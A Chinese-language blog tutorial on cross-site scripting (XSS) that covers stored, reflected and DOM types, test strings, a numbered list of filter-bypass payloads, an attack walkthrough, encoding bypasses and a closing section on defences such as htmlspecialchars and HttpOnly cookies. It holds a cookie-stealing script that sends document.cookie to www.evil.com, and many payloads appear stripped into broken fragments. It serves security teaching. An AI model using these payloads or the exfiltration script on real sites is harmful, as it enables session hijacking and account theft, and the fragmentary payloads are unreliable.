• 网络安全之从原理看懂XSS


    01、XSS的原理和分类

    跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆

    故将跨站脚本攻击缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,XSS攻击针对的是用户层面的攻击;

    XSS分为:存储型,反射型,DOM型XSS
    图片.png
    图片.png

    存储型XSS:存储型XSS,持久化,代码是存储在服务器中,如在个人信息或发表文章等地方,插入代码,如果没有过滤或者过滤不严,那么这些代码将储存到数据库中,用户访问该页面的时候出发代码执行,这种XSS比较危险,容易造成蠕虫,盗取Cookie;

    反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面,反射性XSS大多数是用来盗取用户的Cookie信息;

    DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞,DOM-XSS是用过url传入参数取控制触发的,其实也属于反射型XSS,DOM的详解:DOM文档对象模型;

    【一一帮助安全学习,所有资源获取处一一】
    ①网络安全学习路线
    ②20份渗透测试电子书
    ③安全攻防357页笔记
    ④50份安全攻防面试指南
    ⑤安全红队渗透工具包
    ⑥网络安全必备书籍
    ⑦100个漏洞实战案例
    ⑧安全大厂内部视频资源
    ⑨历年CTF夺旗赛题解析

    可能触发DOM型XSS的属性

    document.referer
    window.name
    location
    innerHTML
    documen.write

    02、XSS攻击的危害

    1、盗取各类用户账号,如机器登陆账号,用户网银账号,各类管理员账号;
    2、控制企业数据,包括读取,篡改,添加,删除企业敏感数据的能力;
    3、盗取企业重要的具有商业价值的资料;
    4、非法转账;
    5、强制发送电子邮件;
    6、网站挂马;
    7、控制受害者机器向其他网站发起攻击;

    03、XSS的测试语句

    在网站是否存在XSS漏洞时,应该输入一些标签,如<,>输入后查看网页源代码是否过滤标签,如果没有过滤,很大可能存在XSS漏洞。

    常用测试语句:

    1

    图片.png

    1
    图片.png

    可以看到,网站并没有对标签进行过滤;

    图片.png

    可以看到,并没有弹出,但是控制台上输出了1,我们可以确定,确实存在XSS;

    闭合问题:很多时候,在测试XSS的时候,想要要考虑到闭合问题,我们首先查看网页的源代码,需要首先判断出来,网站用的时单引号闭合还是双引号闭合;

    ">x<"

    '>x<'

    单行注释:

    ">x//#双斜杠表示注释掉后面的语句

    0x04、XSS攻击语句

    输入检测确定标签没有过滤,为了显示漏洞存在,需要插入XSS攻击代码;

    
    
    
    aa
    
    • 1
    • 2
    • 3
    • 4

    (1)普通的 XSS JavaScript 注入

    (2)IMG 标签 XSS 使用 JavaScript 命令

    (3)IMG 标签无分号无引号

    (4)IMG 标签大小写不敏感

    (5)HTML 编码(必须有分号)

    (6)修正缺陷 IMG 标签
    ">
    (7)formCharCode 标签(计算器)

    (8)UTF-8 的 Unicode 编码(计算器)

    (9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)

    (10)十六进制编码也是没有分号(计算器)

    (11)嵌入式标签,将 Javascript 分开

    (12)嵌入式编码标签,将 Javascript 分开

    (13)嵌入式换行符

    (14)嵌入式回车

    (15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子

    (16)解决限制字符(要求同页面)

    
    
    
    
    
    
    
    
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    (17)空字符 12-7-1 T00LS - Powered by Discuz! Board
    https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "";' > out
    (18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用
    perl -e 'print "alert(\"XSS\")";' > out
    (19)Spaces 和 meta 前的 IMG 标签

    (20)Non-alpha-non-digit XSS

    (21)Non-alpha-non-digit XSS to 2

    
    
    • 1

    (22)Non-alpha-non-digit XSS to 3

    (23)双开括号
    <
    (24)无结束脚本标记(仅火狐等浏览器)

    (29)换码过滤的 JavaScript
    \";alert('XSS');//
    (30)结束 Title 标签

    (31)Input Image

    (32)BODY Image

    (33)BODY 标签

    (34)IMG Dynsrc

    (35)IMG Lowsrc

    (36)BGSOUND

    (37)STYLE sheet

    (38)远程样式表

    (39)List-style-image(列表式)

    • XSS
      (41)META 链接 url

      (42)Iframe

      (43)Frame

      
      12-7-1 T00LS - Powered by Discuz!
      Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
      
      • 1
      • 2
      • 3

      (44)Table


      (45)TD

      (46)DIV background-image

      (47)DIV background-image 后加上额外字符
      (1-32&34&39&160&8192-8&13&12288&65279) **
      **
      (48)DIV expression

      (49)STYLE 属性分拆表达

      (50)匿名 STYLE(组成:开角号和一个字母开头)

      (51)STYLE background-image

      (52)IMG STYLE 方式
      exppression(alert("XSS"))'>
      (53)STYLE background

      
      (54)BASE
      
      
      • 1
      • 2
      • 3

      (55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS

      (56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码
      a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
      (57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上

      implementation="http://3w.org/XSS/xss.htc">XSS
      (58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用

      (59)IMG 嵌入式命令,可执行任意命令

      (60)IMG 嵌入式命令(a.jpg 在同服务器)
      Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
      (61)绕符号过滤·

      (62)
      (63)
      (64)
      (65)
      (66)

      12-7-1 T00LS - Powered by Discuz! Board
      https://www.a.com/viewthread.php?action=printable&tid=15267 4/6
      
      • 1
      • 2
      • 3

      (67)

      PT SRC="http://3w.org/xss.js">
      
      • 1

      (68)URL 绕行
      XSS
      (69)URL 编码
      XSS
      (70)IP 十进制
      XSS
      (72)IP 八进制
      XSS
      (74)节省[http:]
      XSS
      (75)节省[www]
      XSS
      (76)绝对点绝对 DNS
      XSS
      (77)javascript 链接
      XSS

      各个标签的的攻击语句;

         #弹出hack
         #弹出hack
              #弹出1,对于数字可以不用引号
            #弹出cookie
        #引用外部的xss
      
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6

      svg标签:

      
      
      • 1
      • 2
      • 3

      标签:

      
        #弹出cookie
      
      
      • 1
      • 2
      • 3

      标签:

      
      
      
      
      • 1
      • 2
      • 3

      video 标签:

      • 1
      • 2

      style标签:

      
      
      
      • 1
      • 2

      05、XSS漏洞的挖掘

      5.1、黑盒测试

      尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:

      • URL的每一个参数

      • URL本身

      • 表单

      • 搜索框

      5.2、常见业务场景

      • 重灾区:评论区,留言区,个人信息,订单信息等

      • 针对型:站内信,网页及时通讯,私信,意见反馈

      • 存在风险:搜索框,当前目录,图片属性等;

      5.3、白盒审计

      关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手;

      PHP中常见的接收参数的方法有 G E T , _GET, GET_POST,$_REQUEST等等,可以搜索所有接收参数的方法,然后对接收到的数据进行跟踪,看看有没有输出到页面中,然后看看输出到页面中的数据是否进行了过滤和html编码等处理

      也可以搜索类似echo这样的输出语句,跟踪输出的变量是从哪里来的,我们是否能控制,如果从数据库中取得,是否能控制存到数据库得数据,存到数据库之前有没有得到过滤等等;

      大多数程序会对接收参数封装在公共文件得函数中统一调用,我们就需要审计这些公共函数看有没有过滤,能否绕过等等;

      同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计;

      06、XSS的攻击过程

      6.1、反射型XSS漏洞:

      1、Alice经常浏览某个网站,此网站为Bob所拥有,Bob的站点需要Alice使用用户名、密码进行登陆,并存储了Ailce敏感信息(比如银行账户);

      2、Tom发现Bob的站点存在反射的XSS漏洞;

      3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp,做成链接的形式,并利用各种手段诱导Alice点击

      4、Alice在登陆Bob的站点后,浏览了Tom提供的恶意链接;

      5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行,此脚本盗取敏感信息(cookie,账号等信息),然后在Alice完全不知情的情况下将这些信息发送给了Tom;

      6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点,如果脚本的功能更强大的化,Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制;

      6.2、存储型XSS漏洞:

      1、Bob拥有一个Web站点,该站点允许用户发布信息,浏览已发布的信息;

      2、Tom检测到Bob的站点存在存储型的XSS漏洞;

      3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其他用户来阅读该热点信息;

      4、Bob或者时任何的其他人,如Alice浏览了该信息之后,Tom的恶意脚本就会执行;

      5、Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发起一次XSS攻击;

      07、XSS攻击测试

      7.1、远程加载攻击payload

      XSS漏洞能够通过构造恶意的XSS语句实现很多功能,其中做常用的时,构建XSS恶意代码获取对方浏览器的COOKIE;

      1)我们首先把恶意代码保存在本地kali里面,实战情况下,我们将代码保存在我们的服务器上;

      var img=document.createElement("img");
      img.src="http://www.evil.com/log?"+escape(document.cookie);
      document.body.appendChild(img);
      
      
      • 1
      • 2
      • 3
      • 4

      图片.png

      2)我们在kali,用python开启http服务;

      python -m http.server 80

      3)我们在有XSS漏洞的地方,远程加载我们的恶意代码:

      图片.png

      看到浏览器加载了,我们的xss恶意代码;

      4)成功获取到了cookie信息
      图片.png

      5)图片创建链接

      
      
      
      • 1
      • 2
      • 3
      • 4

      6)字符拼接

      这种一般是输入的字符有限制的时候使用

      
      
      
      
      
      
      
      
      
      
      有的情况要用/**/注释不需要的代码。
      
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12

      7)jQuery加载

      
      
      
      • 1
      • 2

      7.2、反射型XSS:

      //前端 1.html:
      
      
          
          反射型XSS
      
      
          
      //后端 action.php:
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20

      我们接着在输入框输入:
      图片.png

      页面直接弹出了xss的页面,可以看到, 我们插入的语句已经被页面给执行了,这就是最基本的反射型XSS漏洞,这种漏洞流向:前端–>后端–>前端

      7.3、存储型XSS:

      //前端:2.html
      
      
          
          存储型XSS
      
      
          
      输入你的ID:
      输入你的Name:
      //后端:action2.php //供其他用户访问页面:show2.php
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20
      • 21
      • 22
      • 23
      • 24
      • 25
      • 26
      • 27
      • 28
      • 29
      • 30
      • 31
      • 32
      • 33
      • 34
      • 35

      这里有一个用户提交页面,数据提交给后端之后,后端存储在数据库中,然后当其他用户访问另一个页面的时候,后端调出该数据,显示给另一个用户,XSS代码就被执行了;

      图片.png

      我们输入3和,接着,我们看看数据库;

      图片.png

      可以看到,我们的XSS语句已经插入到数据库中了;

      然后当其他用户访问,show2.php页面的时候,我们插入的XSS代码就执行了;

      存储型XSS的数据流向是:前端–>后端–>数据库–>后端–>前端
      图片.png

      7.4、DOM型XSS

      先放源代码:

      // 前端3.html
      
        
        
        DOM型XSS
        
        
        
      // 后端action3.php
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20
      • 21
      • 22
      • 23
      • 24
      • 25

      这里有一个提交页面,用户可以在此提交数据,数据提交之后,给后台处理;

      图片.png

      我们可以输入,然后看看页面的变化;

      页面直接弹出了hack的页面,我们插入的语句已经被页面给执行了;

      这就是DOM型XSS的漏洞,这种漏洞的数据流向是:前端–>浏览器

      08、XSS编码绕过

      8.1、gpc过滤字符

      如果gpc开启的时候,特殊字符会被加上斜杠即,‘变成’,xss攻击代码不要用带单引号和双引号;

      绕过gpc在php高版本gpc默认是没有的,但是开发程序员会使用addcslashes()对特殊字符进行转义;
      这个是执行不了的
      没有单引号可执行

      8.2、过滤alert

      当页面过滤alert这个函数时,因为这个函数会弹窗,不仅很多程序会对他进行过滤,而且很多waf都会对其进行拦截,所以不存在alert即可;

      
      
      
      
      
      • 1
      • 2
      • 3
      • 4

      8.3、过滤标签

      在程序里如果使用了html实体过滤,在php会使用htmlspecialchars()对输入的字符进行实体化,实体化之后的字符不会在html执行,把预定义的字符"<“(小于)和”>"(大于)转化为HTML实体,构造xss恶意代码大多数都必须使用<或者>,这两个字符被实体化之后,html里就不能执行了;

      预定义的字符是:

      &(和号)成为&

      “(双引号)成为"

      ’(单引号)成为'

      <(小于)成为<

      ·>(大于)成为>

      图片.png

      但是又在input这些标签里是不用考虑标签实体化,因为用不上<>这两个标签,


      图片.png

      8.4、ascii编码


      图片.png

      8.5、url编码

      123
      图片.png

      8.6、JS编码

      编码直通车:https://www.jb51.net/tools/zhuanhuan.htm

      八进制编码:

      图片.png

      16进制编码

      图片.png

      jsunicode编码

      图片.png

      8.7、HTML编码

      在=后可以解析html编码

      十进制:

      图片.png

      十六进制

      ''
      
      
      • 1
      • 2

      8.8、base64编码

      使用伪协议base64解码执行xss

      111
      
      
      
      
      • 1
      • 2
      • 3
      • 4

      0x09、XSS的防御

      XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行;

      对输入的内容进行过滤,可以分为黑名单和白名单过滤,黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的;

      对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行;

      如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转化为html实体;

      #使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
      $name = htmlspecialchars( $_GET[ 'name' ] );
      
      
      • 1
      • 2
      • 3

      我们还可以服务端设置会话Cookie的HTTP Only属性,这样客户端的JS脚本就不能获取Cookie信息了;

    • 相关阅读:
      快速幂算法
      Linux Shell脚本的10个有用的“面试问题和解答”
      Dorkish:一款针对OSINT和网络侦查任务的Chrome扩展
      MySQL身份验证绕过漏洞
      计算机毕业论文选题java毕业设计软件源代码SSH健身房管理系统[包运行成功]
      ES6的内置对象扩展
      编译原理—词法分析、构建DFA、上下文无关文法、LL(1)分析、提取正规式
      百面深度学习-循环神经网络
      【StreamSets】StreamSets 运行性能检测和优化
      ubuntu上ffmpeg使用framebuffer显示video
    • 原文地址:https://blog.csdn.net/kali_Ma/article/details/128203171